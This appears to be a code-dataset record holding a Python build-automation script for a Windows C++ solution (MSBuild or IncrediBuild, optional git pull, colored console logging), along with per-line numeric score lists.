[ 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0.012345679012345678, 0.011627906976744186, 0.010869565217391304, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0.011494252873563218, 0, 0, 0, 0, 0, 0.010752688172043012, 0, 0, 0, 0, 0.010869565217391304, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0.011904761904761904, 0, 0.008849557522123894, 0.0136986301369863, 0, 0, 0, 0, 0, 0, 0.011494252873563218, 0.015873015873015872, 0, 0, 0.008695652173913044, 0, 0, 0.012195121951219513, 0.010752688172043012, 0, 0, 0, 0, 0, 0, 0.012195121951219513, 0, 0, 0.015037593984962405, 0.01098901098901099, 0.012195121951219513, 0, 0, 0, 0, 0, 0, 0, 0, 0.017241379310344827, 0.010869565217391304, 0, 0, 0.00980392156862745, 0.012345679012345678, 0.02247191011235955, 0.017241379310344827, 0, 0, 0.01, 0, 0, 0, 0.03125, 0, 0, 0, 0, 0, 0, 0.018867924528301886, 0.012048192771084338, 0, 0.005208333333333333, 0, 0, 0, 0, 0.011494252873563218, 0, 0, 0, 0, 0.008849557522123894, 0, 0.012987012987012988, 0, 0, 0, 0, 0, 0, 0, 0, 0.2, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0 ]
204
0.003003
false
#!python3 # -*- coding:utf-8 -*- import os import sys import time import ctypes import shutil import subprocess IsPy3 = sys.version_info[0] >= 3 if IsPy3: import winreg else: import codecs import _winreg as winreg BuildType = 'Release' IsRebuild = True Build = 'Rebuild' Update = False Copy = False CleanAll = False BuildTimeout = 30*60 MSBuild = None IncrediBuild = None UseMSBuild = True #默认用MSBuild编译,如果为False则用IncrediBuild编译 #不同项目只需修改下面5个变量 SlnFile = '../CAceTCPServer.sln' #相对于本py脚本路径的相对路径 UpdateDir = [] #相对于本py脚本路径的相对路径,填空不更新 ExecBatList = [] #相对于本py脚本路径的相对路径,编译前调用的脚本,可填空,执行bat会先cd到bat目录再执行 MSBuildFirstProjects = [r'CAceTCPServer'] #使用MSBuild需要工程文件在解决方案sln中的路径 # MSBuild首先编译的项目,填空不指定顺序 IncrediBuildFirstProjects = ['CAceTCPServer'] #使用IncrediBuild只需工程名字 #IncrediBuild首先编译的项目,填空不指定顺序 class ConsoleColor(): '''This class defines the values of color for printing on console window''' Black = 0 DarkBlue = 1 DarkGreen = 2 DarkCyan = 3 DarkRed = 4 DarkMagenta = 5 DarkYellow = 6 Gray = 7 DarkGray = 8 Blue = 9 Green = 10 Cyan = 11 Red = 12 Magenta = 13 Yellow = 14 White = 15 class Coord(ctypes.Structure): _fields_ = [('X', ctypes.c_short), ('Y', ctypes.c_short)] class SmallRect(ctypes.Structure): _fields_ = [('Left', ctypes.c_short), ('Top', ctypes.c_short), ('Right', ctypes.c_short), ('Bottom', ctypes.c_short), ] class ConsoleScreenBufferInfo(ctypes.Structure): _fields_ = [('dwSize', Coord), ('dwCursorPosition', Coord), ('wAttributes', ctypes.c_uint), ('srWindow', SmallRect), ('dwMaximumWindowSize', Coord), ] class Win32API(): '''Some native methods for python calling''' StdOutputHandle = -11 ConsoleOutputHandle = None DefaultColor = None @staticmethod def SetConsoleColor(color): '''Change the text color on console window''' if not Win32API.DefaultColor: if not Win32API.ConsoleOutputHandle: Win32API.ConsoleOutputHandle = ctypes.windll.kernel32.GetStdHandle(Win32API.StdOutputHandle) bufferInfo = ConsoleScreenBufferInfo() ctypes.windll.kernel32.GetConsoleScreenBufferInfo(Win32API.ConsoleOutputHandle, ctypes.byref(bufferInfo)) Win32API.DefaultColor = int(bufferInfo.wAttributes & 0xFF) if IsPy3: sys.stdout.flush() # need flush stdout in python 3 ctypes.windll.kernel32.SetConsoleTextAttribute(Win32API.ConsoleOutputHandle, color) @staticmethod def ResetConsoleColor(): '''Reset the default text color on console window''' if IsPy3: sys.stdout.flush() # need flush stdout in python 3 ctypes.windll.kernel32.SetConsoleTextAttribute(Win32API.ConsoleOutputHandle, Win32API.DefaultColor) class Logger(): LogFile = '@AutomationLog.txt' LineSep = '\n' @staticmethod def Write(log, consoleColor = -1, writeToFile = True, printToStdout = True): ''' consoleColor: value in class ConsoleColor, such as ConsoleColor.DarkGreen if consoleColor == -1, use default color ''' if printToStdout: isValidColor = (consoleColor >= ConsoleColor.Black and consoleColor <= ConsoleColor.White) if isValidColor: Win32API.SetConsoleColor(consoleColor) try: sys.stdout.write(log) except UnicodeError as e: Win32API.SetConsoleColor(ConsoleColor.Red) isValidColor = True sys.stdout.write(str(type(e)) + ' can\'t print the log!\n') if isValidColor: Win32API.ResetConsoleColor() if not writeToFile: return if IsPy3: logFile = open(Logger.LogFile, 'a+', encoding = 'utf-8') else: logFile = codecs.open(Logger.LogFile, 'a+', 'utf-8') try: logFile.write(log) # logFile.flush() # need flush in python 3, otherwise log won't be saved except Exception as ex: logFile.close() sys.stdout.write('can not write log with exception: {0} {1}'.format(type(ex), ex)) @staticmethod def WriteLine(log, consoleColor = -1, writeToFile = True, printToStdout = True): ''' consoleColor: value in class ConsoleColor, such as ConsoleColor.DarkGreen if consoleColor == -1, use default color ''' Logger.Write(log + Logger.LineSep, consoleColor, writeToFile, printToStdout) @staticmethod def Log(log, consoleColor = -1, writeToFile = True, printToStdout = True): ''' consoleColor: value in class ConsoleColor, such as ConsoleColor.DarkGreen if consoleColor == -1, use default color ''' t = time.localtime() log = '{0}-{1:02}-{2:02} {3:02}:{4:02}:{5:02} - {6}{7}'.format(t.tm_year, t.tm_mon, t.tm_mday, t.tm_hour, t.tm_min, t.tm_sec, log, Logger.LineSep) Logger.Write(log, consoleColor, writeToFile, printToStdout) @staticmethod def DeleteLog(): if os.path.exists(Logger.LogFile): os.remove(Logger.LogFile) def GetMSBuildPath(): cmd = 'call "%VS120COMNTOOLS%..\\..\\VC\\vcvarsall.bat" x86\nwhere msbuild' ftemp = open('GetMSBuildPath.bat', 'wt') ftemp.write(cmd) ftemp.close() p = subprocess.Popen('GetMSBuildPath.bat', stdout = subprocess.PIPE) p.wait() lines = p.stdout.read().decode().splitlines() os.remove('GetMSBuildPath.bat') for line in lines: if 'MSBuild.exe' in line: return line def GetIncrediBuildPath(): try: key=winreg.OpenKey(winreg.HKEY_LOCAL_MACHINE, r'SOFTWARE\Classes\IncrediBuild.MonitorFile\shell\open\command') value, typeId = winreg.QueryValueEx(key, '') if value: start = value.find('"') end = value.find('"', start + 1) path = value[start+1:end] buildConsole = os.path.join(os.path.dirname(path), 'BuildConsole.exe') return buildConsole except FileNotFoundError as e: Logger.WriteLine('can not find IncrediBuild', ConsoleColor.Red) def UpdateCode(): # put git to path first if not shutil.which('git.exe'): Logger.Log('找不到git.exe. 请确认安装git时将git\bin目录路径加入到环境变量path中!!!\n, 跳过更新代码!!!', ConsoleColor.Yellow) return false oldDir = os.getcwd() for dir in UpdateDir: os.chdir(dir) ret = os.system('git pull') os.chdir(oldDir) if ret != 0: Logger.Log('update {0} failed'.format(dir), ConsoleColor.Yellow) return false return True def BuildProject(cmd): for i in range(6): Logger.WriteLine(cmd, ConsoleColor.Cyan) buildFailed = True startTime = time.time() p = subprocess.Popen(cmd) #IncrediBuild不能使用stdout=subprocess.PIPE,否则会导致p.wait()不返回,可能是IncrediBuild的bug if IsPy3: try: buildFailed = p.wait(BuildTimeout) except subprocess.TimeoutExpired as e: Logger.Log('{0}'.format(e), ConsoleColor.Yellow) p.kill() else: buildFailed = p.wait() if not UseMSBuild: #IncrediBuild的返回值不能说明编译是否成功,需要提取输出判断 fin = open('IncrediBuild.log') for line in fin: if line.startswith('=========='): Logger.Write(line, ConsoleColor.Cyan, writeToFile = True if IsPy3 else False) if IsPy3: start = line.find('失败') + 3 #========== 生成: 成功 1 个,失败 0 个,最新 0 个,跳过 0 个 ========== else:#为了兼容py2做的特殊处理,很恶心 start = 0 n2 = 0 while 1: if line[start].isdigit(): n2 += 1 if n2 == 2: break start = line.find(' ', start) start += 1 end = line.find(' ', start) failCount = int(line[start:end]) buildFailed = failCount > 0 else: Logger.Write(line, ConsoleColor.Red, writeToFile = True if IsPy3 else False, printToStdout = True if ' error ' in line else False) fin.close() costTime = time.time() - startTime Logger.WriteLine('build cost time: {0:.1f}s\n'.format(costTime), ConsoleColor.Green) if not buildFailed: return True return False def BuildAllProjects(): buildSuccess = False cmds = [] if UseMSBuild: if IsRebuild: if CleanAll: cmds.append('{0} {1} /t:Clean /p:Configuration={2} /nologo /maxcpucount /filelogger /consoleloggerparameters:ErrorsOnly'.format(MSBuild, SlnFile, 'Debug')) cmds.append('{0} {1} /t:Clean /p:Configuration={2} /nologo /maxcpucount /filelogger /consoleloggerparameters:ErrorsOnly'.format(MSBuild, SlnFile, 'Release')) else: cmds.append('{0} {1} /t:Clean /p:Configuration={2} /nologo /maxcpucount /filelogger /consoleloggerparameters:ErrorsOnly'.format(MSBuild, SlnFile, BuildType)) for project in MSBuildFirstProjects: cmds.append('{0} {1} /t:{2} /p:Configuration={3} /nologo /maxcpucount /filelogger /consoleloggerparameters:ErrorsOnly'.format(MSBuild, SlnFile, project, BuildType)) cmds.append('{0} {1} /p:Configuration={2} /nologo /maxcpucount /filelogger /consoleloggerparameters:ErrorsOnly'.format(MSBuild, SlnFile, BuildType)) else: #IncrediBuild if IsRebuild: if CleanAll: cmds.append('"{0}" {1} /clean /cfg="{2}|Win32" /nologo /out=IncrediBuild.log'.format(IncrediBuild, SlnFile, 'Debug')) cmds.append('"{0}" {1} /clean /cfg="{2}|Win32" /nologo /out=IncrediBuild.log'.format(IncrediBuild, SlnFile, 'Release')) else: cmds.append('"{0}" {1} /clean /cfg="{2}|Win32" /nologo /out=IncrediBuild.log'.format(IncrediBuild, SlnFile, BuildType)) for project in IncrediBuildFirstProjects: cmds.append('"{0}" {1} /build /prj={2} /cfg="{3}|Win32" /nologo /out=IncrediBuild.log'.format(IncrediBuild, SlnFile, project, BuildType)) cmds.append('"{0}" {1} /build /cfg="{2}|Win32" /nologo /out=IncrediBuild.log'.format(IncrediBuild, SlnFile, BuildType)) for cmd in cmds: buildSuccess = BuildProject(cmd) if not buildSuccess: break return buildSuccess def main(): if UseMSBuild: if not os.path.exists(MSBuild): Logger.Log('can not find msbuild.exe', ConsoleColor.Red) return 1 else: if not os.path.exists(IncrediBuild): Logger.Log('can not find msbuild.exe', ConsoleColor.Red) return 1 dir = os.path.dirname(__file__) if dir: oldDir = os.getcwd() os.chdir(dir) if Update: if not UpdateCode(): return 1 Logger.Log('git update succeed', ConsoleColor.Green) if Copy: for bat in ExecBatList: oldBatDir = os.getcwd() batDir = os.path.dirname(bat) batName = os.path.basename(bat) if batDir: os.chdir(batDir) start = time.clock() os.system(batName) Logger.Log('run "{}" cost {:.1f} seconds'.format(batName, time.clock() - start), ConsoleColor.Green) if batDir: os.chdir(oldBatDir) buildSuccess = BuildAllProjects() if buildSuccess: Logger.Log('build succeed', ConsoleColor.Green) else: Logger.Log('build failed', ConsoleColor.Red) if dir: os.chdir(oldDir) return 0 if buildSuccess else 1 if __name__ == '__main__': Logger.Log('run with argv ' + str(sys.argv), ConsoleColor.Green) sys.argv = [x.lower() for x in sys.argv] start_time = time.time() if 'debug' in sys.argv: BuildType = 'Debug' if 'build' in sys.argv: IsRebuild = False Build = 'Build' if 'update' in sys.argv: Update = True if 'copy' in sys.argv: Copy = True if 'clean' in sys.argv: CleanAll = True if 'incredibuild' in sys.argv: UseMSBuild = False if UseMSBuild: MSBuild = GetMSBuildPath() if not MSBuild: Logger.Log('can not find MSBuild.exe', ConsoleColor.Red) exit(1) else: IncrediBuild = GetIncrediBuildPath() if not IncrediBuild: Logger.Log('can not find BuildConsole.exe', ConsoleColor.Red) exit(1) cwd = os.getcwd() Logger.WriteLine('current dir is: {0}, {1}: {2}'.format(cwd, Build, BuildType)) ret = main() end_time = time.time() cost_time = end_time-start_time Logger.WriteLine('all build cost time: {0:.2f} seconds'.format(cost_time), ConsoleColor.Green) exit(ret)
[ "#!python3\r\n", "# -*- coding:utf-8 -*-\r\n", "import os\r\n", "import sys\r\n", "import time\r\n", "import ctypes\r\n", "import shutil\r\n", "import subprocess\r\n", "IsPy3 = sys.version_info[0] >= 3\r\n", "if IsPy3:\r\n", " import winreg\r\n", "else:\r\n", " import codecs\r\n", " import _winreg as winreg\r\n", "\r\n", "BuildType = 'Release'\r\n", "IsRebuild = True\r\n", "Build = 'Rebuild'\r\n", "Update = False\r\n", "Copy = False\r\n", "CleanAll = False\r\n", "BuildTimeout = 30*60\r\n", "MSBuild = None\r\n", "IncrediBuild = None\r\n", "UseMSBuild = True #默认用MSBuild编译,如果为False则用IncrediBuild编译\r\n", "\r\n", "#不同项目只需修改下面5个变量\r\n", "SlnFile = '../CAceTCPServer.sln' #相对于本py脚本路径的相对路径\r\n", "UpdateDir = [] #相对于本py脚本路径的相对路径,填空不更新\r\n", "ExecBatList = [] #相对于本py脚本路径的相对路径,编译前调用的脚本,可填空,执行bat会先cd到bat目录再执行\r\n", "MSBuildFirstProjects = [r'CAceTCPServer'] #使用MSBuild需要工程文件在解决方案sln中的路径\r\n", " # MSBuild首先编译的项目,填空不指定顺序\r\n", "IncrediBuildFirstProjects = ['CAceTCPServer'] #使用IncrediBuild只需工程名字\r\n", " #IncrediBuild首先编译的项目,填空不指定顺序\r\n", "\r\n", "class ConsoleColor():\r\n", " '''This class defines the values of color for printing on console window'''\r\n", " Black = 0\r\n", " DarkBlue = 1\r\n", " DarkGreen = 2\r\n", " DarkCyan = 3\r\n", " DarkRed = 4\r\n", " DarkMagenta = 5\r\n", " DarkYellow = 6\r\n", " Gray = 7\r\n", " DarkGray = 8\r\n", " Blue = 9\r\n", " Green = 10\r\n", " Cyan = 11\r\n", " Red = 12\r\n", " Magenta = 13\r\n", " Yellow = 14\r\n", " White = 15\r\n", "\r\n", "class Coord(ctypes.Structure):\r\n", " _fields_ = [('X', ctypes.c_short), ('Y', ctypes.c_short)]\r\n", "\r\n", "class SmallRect(ctypes.Structure):\r\n", " _fields_ = [('Left', ctypes.c_short),\r\n", " ('Top', ctypes.c_short),\r\n", " ('Right', ctypes.c_short),\r\n", " ('Bottom', ctypes.c_short),\r\n", " ]\r\n", "\r\n", "class ConsoleScreenBufferInfo(ctypes.Structure):\r\n", " _fields_ = [('dwSize', Coord),\r\n", " ('dwCursorPosition', Coord),\r\n", " ('wAttributes', ctypes.c_uint),\r\n", " ('srWindow', SmallRect),\r\n", " ('dwMaximumWindowSize', Coord),\r\n", " ]\r\n", "\r\n", "class Win32API():\r\n", " '''Some native methods for python calling'''\r\n", " StdOutputHandle = -11\r\n", " ConsoleOutputHandle = None\r\n", " DefaultColor = None\r\n", "\r\n", " @staticmethod\r\n", " def SetConsoleColor(color):\r\n", " '''Change the text color on console window'''\r\n", " if not Win32API.DefaultColor:\r\n", " if not Win32API.ConsoleOutputHandle:\r\n", " Win32API.ConsoleOutputHandle = ctypes.windll.kernel32.GetStdHandle(Win32API.StdOutputHandle)\r\n", " bufferInfo = ConsoleScreenBufferInfo()\r\n", " ctypes.windll.kernel32.GetConsoleScreenBufferInfo(Win32API.ConsoleOutputHandle, ctypes.byref(bufferInfo))\r\n", " Win32API.DefaultColor = int(bufferInfo.wAttributes & 0xFF)\r\n", " if IsPy3:\r\n", " sys.stdout.flush() # need flush stdout in python 3\r\n", " ctypes.windll.kernel32.SetConsoleTextAttribute(Win32API.ConsoleOutputHandle, color)\r\n", "\r\n", " @staticmethod\r\n", " def ResetConsoleColor():\r\n", " '''Reset the default text color on console window'''\r\n", " if IsPy3:\r\n", " sys.stdout.flush() # need flush stdout in python 3\r\n", " ctypes.windll.kernel32.SetConsoleTextAttribute(Win32API.ConsoleOutputHandle, Win32API.DefaultColor)\r\n", "\r\n", "class Logger():\r\n", " LogFile = '@AutomationLog.txt'\r\n", " LineSep = '\\n'\r\n", " @staticmethod\r\n", " def Write(log, consoleColor = -1, writeToFile = True, printToStdout = True):\r\n", " '''\r\n", " consoleColor: value in class ConsoleColor, such as ConsoleColor.DarkGreen\r\n", " if consoleColor == -1, use default color\r\n", " '''\r\n", " if printToStdout:\r\n", " isValidColor = (consoleColor >= ConsoleColor.Black and consoleColor <= ConsoleColor.White)\r\n", " if isValidColor:\r\n", " Win32API.SetConsoleColor(consoleColor)\r\n", " try:\r\n", " sys.stdout.write(log)\r\n", " except UnicodeError as e:\r\n", " Win32API.SetConsoleColor(ConsoleColor.Red)\r\n", " isValidColor = True\r\n", " sys.stdout.write(str(type(e)) + ' can\\'t print the log!\\n')\r\n", " if isValidColor:\r\n", " Win32API.ResetConsoleColor()\r\n", " if not writeToFile:\r\n", " return\r\n", " if IsPy3:\r\n", " logFile = open(Logger.LogFile, 'a+', encoding = 'utf-8')\r\n", " else:\r\n", " logFile = codecs.open(Logger.LogFile, 'a+', 'utf-8')\r\n", " try:\r\n", " logFile.write(log)\r\n", " # logFile.flush() # need flush in python 3, otherwise log won't be saved\r\n", " except Exception as ex:\r\n", " logFile.close()\r\n", " sys.stdout.write('can not write log with exception: {0} {1}'.format(type(ex), ex))\r\n", "\r\n", " @staticmethod\r\n", " def WriteLine(log, consoleColor = -1, writeToFile = True, printToStdout = True):\r\n", " '''\r\n", " consoleColor: value in class ConsoleColor, such as ConsoleColor.DarkGreen\r\n", " if consoleColor == -1, use default color\r\n", " '''\r\n", " Logger.Write(log + Logger.LineSep, consoleColor, writeToFile, printToStdout)\r\n", "\r\n", " @staticmethod\r\n", " def Log(log, consoleColor = -1, writeToFile = True, printToStdout = True):\r\n", " '''\r\n", " consoleColor: value in class ConsoleColor, such as ConsoleColor.DarkGreen\r\n", " if consoleColor == -1, use default color\r\n", " '''\r\n", " t = time.localtime()\r\n", " log = '{0}-{1:02}-{2:02} {3:02}:{4:02}:{5:02} - {6}{7}'.format(t.tm_year, t.tm_mon, t.tm_mday,\r\n", " t.tm_hour, t.tm_min, t.tm_sec, log, Logger.LineSep)\r\n", " Logger.Write(log, consoleColor, writeToFile, printToStdout)\r\n", "\r\n", " @staticmethod\r\n", " def DeleteLog():\r\n", " if os.path.exists(Logger.LogFile):\r\n", " os.remove(Logger.LogFile)\r\n", "\r\n", "\r\n", "def GetMSBuildPath():\r\n", " cmd = 'call \"%VS120COMNTOOLS%..\\\\..\\\\VC\\\\vcvarsall.bat\" x86\\nwhere msbuild'\r\n", " ftemp = open('GetMSBuildPath.bat', 'wt')\r\n", " ftemp.write(cmd)\r\n", " ftemp.close()\r\n", " p = subprocess.Popen('GetMSBuildPath.bat', stdout = subprocess.PIPE)\r\n", " p.wait()\r\n", " lines = p.stdout.read().decode().splitlines()\r\n", " os.remove('GetMSBuildPath.bat')\r\n", " for line in lines:\r\n", " if 'MSBuild.exe' in line:\r\n", " return line\r\n", "\r\n", "def GetIncrediBuildPath():\r\n", " try:\r\n", " key=winreg.OpenKey(winreg.HKEY_LOCAL_MACHINE, r'SOFTWARE\\Classes\\IncrediBuild.MonitorFile\\shell\\open\\command')\r\n", " value, typeId = winreg.QueryValueEx(key, '')\r\n", " if value:\r\n", " start = value.find('\"')\r\n", " end = value.find('\"', start + 1)\r\n", " path = value[start+1:end]\r\n", " buildConsole = os.path.join(os.path.dirname(path), 'BuildConsole.exe')\r\n", " return buildConsole\r\n", " except FileNotFoundError as e:\r\n", " Logger.WriteLine('can not find IncrediBuild', ConsoleColor.Red)\r\n", "\r\n", "def UpdateCode():\r\n", " # put git to path first\r\n", " if not shutil.which('git.exe'):\r\n", " Logger.Log('找不到git.exe. 请确认安装git时将git\\bin目录路径加入到环境变量path中!!!\\n, 跳过更新代码!!!', ConsoleColor.Yellow)\r\n", " return false\r\n", " oldDir = os.getcwd()\r\n", " for dir in UpdateDir:\r\n", " os.chdir(dir)\r\n", " ret = os.system('git pull')\r\n", " os.chdir(oldDir)\r\n", " if ret != 0:\r\n", " Logger.Log('update {0} failed'.format(dir), ConsoleColor.Yellow)\r\n", " return false\r\n", " return True\r\n", "\r\n", "def BuildProject(cmd):\r\n", " for i in range(6):\r\n", " Logger.WriteLine(cmd, ConsoleColor.Cyan)\r\n", " buildFailed = True\r\n", " startTime = time.time()\r\n", " p = subprocess.Popen(cmd) #IncrediBuild不能使用stdout=subprocess.PIPE,否则会导致p.wait()不返回,可能是IncrediBuild的bug\r\n", " if IsPy3:\r\n", " try:\r\n", " buildFailed = p.wait(BuildTimeout)\r\n", " except subprocess.TimeoutExpired as e:\r\n", " Logger.Log('{0}'.format(e), ConsoleColor.Yellow)\r\n", " p.kill()\r\n", " else:\r\n", " buildFailed = p.wait()\r\n", " if not UseMSBuild:\r\n", " #IncrediBuild的返回值不能说明编译是否成功,需要提取输出判断\r\n", " fin = open('IncrediBuild.log')\r\n", " for line in fin:\r\n", " if line.startswith('=========='):\r\n", " Logger.Write(line, ConsoleColor.Cyan, writeToFile = True if IsPy3 else False)\r\n", " if IsPy3:\r\n", " start = line.find('失败') + 3 #========== 生成: 成功 1 个,失败 0 个,最新 0 个,跳过 0 个 ==========\r\n", " else:#为了兼容py2做的特殊处理,很恶心\r\n", " start = 0\r\n", " n2 = 0\r\n", " while 1:\r\n", " if line[start].isdigit():\r\n", " n2 += 1\r\n", " if n2 == 2:\r\n", " break\r\n", " start = line.find(' ', start)\r\n", " start += 1\r\n", " end = line.find(' ', start)\r\n", " failCount = int(line[start:end])\r\n", " buildFailed = failCount > 0\r\n", " else:\r\n", " Logger.Write(line, ConsoleColor.Red, writeToFile = True if IsPy3 else False, printToStdout = True if ' error ' in line else False)\r\n", " fin.close()\r\n", " costTime = time.time() - startTime\r\n", " Logger.WriteLine('build cost time: {0:.1f}s\\n'.format(costTime), ConsoleColor.Green)\r\n", " if not buildFailed:\r\n", " return True\r\n", " return False\r\n", "\r\n", "def BuildAllProjects():\r\n", " buildSuccess = False\r\n", " cmds = []\r\n", " if UseMSBuild:\r\n", " if IsRebuild:\r\n", " if CleanAll:\r\n", " cmds.append('{0} {1} /t:Clean /p:Configuration={2} /nologo /maxcpucount /filelogger /consoleloggerparameters:ErrorsOnly'.format(MSBuild, SlnFile, 'Debug'))\r\n", " cmds.append('{0} {1} /t:Clean /p:Configuration={2} /nologo /maxcpucount /filelogger /consoleloggerparameters:ErrorsOnly'.format(MSBuild, SlnFile, 'Release'))\r\n", " else:\r\n", " cmds.append('{0} {1} /t:Clean /p:Configuration={2} /nologo /maxcpucount /filelogger /consoleloggerparameters:ErrorsOnly'.format(MSBuild, SlnFile, BuildType))\r\n", " for project in MSBuildFirstProjects:\r\n", " cmds.append('{0} {1} /t:{2} /p:Configuration={3} /nologo /maxcpucount /filelogger /consoleloggerparameters:ErrorsOnly'.format(MSBuild, SlnFile, project, BuildType))\r\n", " cmds.append('{0} {1} /p:Configuration={2} /nologo /maxcpucount /filelogger /consoleloggerparameters:ErrorsOnly'.format(MSBuild, SlnFile, BuildType))\r\n", " else: #IncrediBuild\r\n", " if IsRebuild:\r\n", " if CleanAll:\r\n", " cmds.append('\"{0}\" {1} /clean /cfg=\"{2}|Win32\" /nologo /out=IncrediBuild.log'.format(IncrediBuild, SlnFile, 'Debug'))\r\n", " cmds.append('\"{0}\" {1} /clean /cfg=\"{2}|Win32\" /nologo /out=IncrediBuild.log'.format(IncrediBuild, SlnFile, 'Release'))\r\n", " else:\r\n", " cmds.append('\"{0}\" {1} /clean /cfg=\"{2}|Win32\" /nologo /out=IncrediBuild.log'.format(IncrediBuild, SlnFile, BuildType))\r\n", " for project in IncrediBuildFirstProjects:\r\n", " cmds.append('\"{0}\" {1} /build /prj={2} /cfg=\"{3}|Win32\" /nologo /out=IncrediBuild.log'.format(IncrediBuild, SlnFile, project, BuildType))\r\n", " cmds.append('\"{0}\" {1} /build /cfg=\"{2}|Win32\" /nologo /out=IncrediBuild.log'.format(IncrediBuild, SlnFile, BuildType))\r\n", " for cmd in cmds:\r\n", " buildSuccess = BuildProject(cmd)\r\n", " if not buildSuccess:\r\n", " break\r\n", " return buildSuccess\r\n", "\r\n", "def main():\r\n", " if UseMSBuild:\r\n", " if not os.path.exists(MSBuild):\r\n", " Logger.Log('can not find msbuild.exe', ConsoleColor.Red)\r\n", " return 1\r\n", " else:\r\n", " if not os.path.exists(IncrediBuild):\r\n", " Logger.Log('can not find msbuild.exe', ConsoleColor.Red)\r\n", " return 1\r\n", " dir = os.path.dirname(__file__)\r\n", " if dir:\r\n", " oldDir = os.getcwd()\r\n", " os.chdir(dir)\r\n", " if Update:\r\n", " if not UpdateCode():\r\n", " return 1\r\n", " Logger.Log('git update succeed', ConsoleColor.Green)\r\n", " if Copy:\r\n", " for bat in ExecBatList:\r\n", " oldBatDir = os.getcwd()\r\n", " batDir = os.path.dirname(bat)\r\n", " batName = os.path.basename(bat)\r\n", " if batDir:\r\n", " os.chdir(batDir)\r\n", " start = time.clock()\r\n", " os.system(batName)\r\n", " Logger.Log('run \"{}\" cost {:.1f} seconds'.format(batName, time.clock() - start), ConsoleColor.Green)\r\n", " if batDir:\r\n", " os.chdir(oldBatDir)\r\n", " buildSuccess = BuildAllProjects()\r\n", " if buildSuccess:\r\n", " Logger.Log('build succeed', ConsoleColor.Green)\r\n", " else:\r\n", " Logger.Log('build failed', ConsoleColor.Red)\r\n", " if dir:\r\n", " os.chdir(oldDir)\r\n", " return 0 if buildSuccess else 1\r\n", "\r\n", "if __name__ == '__main__':\r\n", " Logger.Log('run with argv ' + str(sys.argv), ConsoleColor.Green)\r\n", " sys.argv = [x.lower() for x in sys.argv]\r\n", " start_time = time.time()\r\n", " if 'debug' in sys.argv:\r\n", " BuildType = 'Debug'\r\n", " if 'build' in sys.argv:\r\n", " IsRebuild = False\r\n", " Build = 'Build'\r\n", " if 'update' in sys.argv:\r\n", " Update = True\r\n", " if 'copy' in sys.argv:\r\n", " Copy = True\r\n", " if 'clean' in sys.argv:\r\n", " CleanAll = True\r\n", " if 'incredibuild' in sys.argv:\r\n", " UseMSBuild = False\r\n", " if UseMSBuild:\r\n", " MSBuild = GetMSBuildPath()\r\n", " if not MSBuild:\r\n", " Logger.Log('can not find MSBuild.exe', ConsoleColor.Red)\r\n", " exit(1)\r\n", " else:\r\n", " IncrediBuild = GetIncrediBuildPath()\r\n", " if not IncrediBuild:\r\n", " Logger.Log('can not find BuildConsole.exe', ConsoleColor.Red)\r\n", " exit(1)\r\n", " cwd = os.getcwd()\r\n", " Logger.WriteLine('current dir is: {0}, {1}: {2}'.format(cwd, Build, BuildType))\r\n", " ret = main()\r\n", " end_time = time.time()\r\n", " cost_time = end_time-start_time\r\n", " Logger.WriteLine('all build cost time: {0:.2f} seconds'.format(cost_time), ConsoleColor.Green)\r\n", " exit(ret)\r\n" ]
[ 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0.034482758620689655, 0, 0.058823529411764705, 0.0392156862745098, 0.05128205128205128, 0.029850746268656716, 0.027777777777777776, 0.06451612903225806, 0.028985507246376812, 0.08571428571428572, 0, 0.043478260869565216, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0.03125, 0, 0, 0.027777777777777776, 0, 0.024390243902439025, 0.023255813953488372, 0.022727272727272728, 0.058823529411764705, 0, 0.02, 0, 0.022222222222222223, 0.020833333333333332, 0.024390243902439025, 0.020833333333333332, 0.058823529411764705, 0, 0.05263157894736842, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0.00909090909090909, 0, 0.008403361344537815, 0, 0, 0.015625, 0.010752688172043012, 0, 0, 0, 0, 0, 0.015625, 0.009174311926605505, 0, 0.058823529411764705, 0, 0, 0.05263157894736842, 0.08536585365853659, 0, 0.012048192771084338, 0, 0, 0, 0.009615384615384616, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0.02857142857142857, 0, 0, 0, 0, 0.011627906976744186, 0, 0, 0.010416666666666666, 0, 0, 0.08139534883720931, 0, 0.012048192771084338, 0, 0, 0.011627906976744186, 0, 0, 0.075, 0, 0.012048192771084338, 0, 0, 0, 0.009615384615384616, 0.015384615384615385, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0.02702702702702703, 0, 0, 0, 0, 0, 0, 0, 0.03571428571428571, 0, 0.016666666666666666, 0, 0, 0, 0, 0, 0.011904761904761904, 0, 0, 0, 0, 0.05263157894736842, 0, 0, 0.009433962264150943, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0.041666666666666664, 0, 0, 0, 0, 0.026785714285714284, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0.02, 0, 0, 0, 0.030303030303030304, 0, 0.01834862385321101, 0.044444444444444446, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0.03289473684210526, 0, 0, 0.010638297872340425, 0, 0, 0, 0, 0.04, 0, 0, 0, 0, 0, 0.005780346820809248, 0.005714285714285714, 0, 0.005714285714285714, 0, 0.00558659217877095, 0.006329113924050633, 0.08, 0, 0, 0.007407407407407408, 0.0072992700729927005, 0, 0.0072992700729927005, 0, 0.006622516556291391, 0.007751937984496124, 0, 0, 0, 0, 0, 0, 0.07692307692307693, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0.008771929824561403, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 